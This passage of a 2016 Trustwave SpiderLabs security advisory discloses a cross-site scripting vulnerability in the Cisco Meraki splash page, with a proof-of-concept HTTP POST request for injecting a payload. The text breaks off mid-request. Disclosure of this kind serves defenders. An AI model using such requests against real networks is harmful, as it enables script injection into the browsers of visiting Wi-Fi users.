Trustwave SpiderLabs Security Advisory TWSL2016-001: Multiple Vulnerabilities in Cisco Meraki Published: 01/12/2016 Version: 1.0 Vendor: Cisco (https://meraki.cisco.com/) Product: Cisco Meraki Product description: Cisco Meraki is a complete cloud managed networking solution. Cisco Meraki is the leader in cloud controlled WiFi, routing, switching and security. Secure and scalable, Cisco Meraki enterprise networks simply work. Finding 1: Cross Site Scripting Credit: Kyprianos Vasilopoulos of Trustwave A cross-site scripting vulnerability is present in the Cisco Meraki portal splash page. When users access a Wifi network they will be redirected to a custom webpage before accessing the internet. By entering the payload on the splash page it is possible to trigger a cross site scripting vulnerability within the visiting user's browser. In order to enter the payload you need to login to the portal The vulnerability has been confirmed on IE 6 and 7. Example: Enter the payload POST /tw_test_net-1-2/n/I9xFFbBc/splash/preview/0/efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8/ HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx.xxx.xxx.xxx/tw_test_net-1-2/n/I9xFFbBc/manage/configure/splash_page Cookie: p_splash_session=MMX84Ps986LNxqVsTJhsTegzOVSw_n_1FK; _session_id_for_n155=a8cf170f0016fc4a44b54f767b5cb6e7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 2511 X-dotNet-Beautifier: 230; DO-NOT-REMOVE authenticity_token=token&ssid[wired_vlan_id]=64&ssid[splash2_theme_identifier]=efb32b6ea3d2ea386e5b77dd2a491a2b1c70a8e8&ssid[admin_splash_url]=&ssid_splash_detail[extra_text]= &ssid_splash_detail[logo_md5]=&ssid_splash_detail[logo_extension]=&ssid[language_code]=en&ssid[splash_timeout]=86400&ssid[overwrite_continue_url_enabled]=false&ssid[overwrite_continue_url]=&settings_change_hash={"ssid_splash_detail[extra_text]":{"label":"Message","new_text":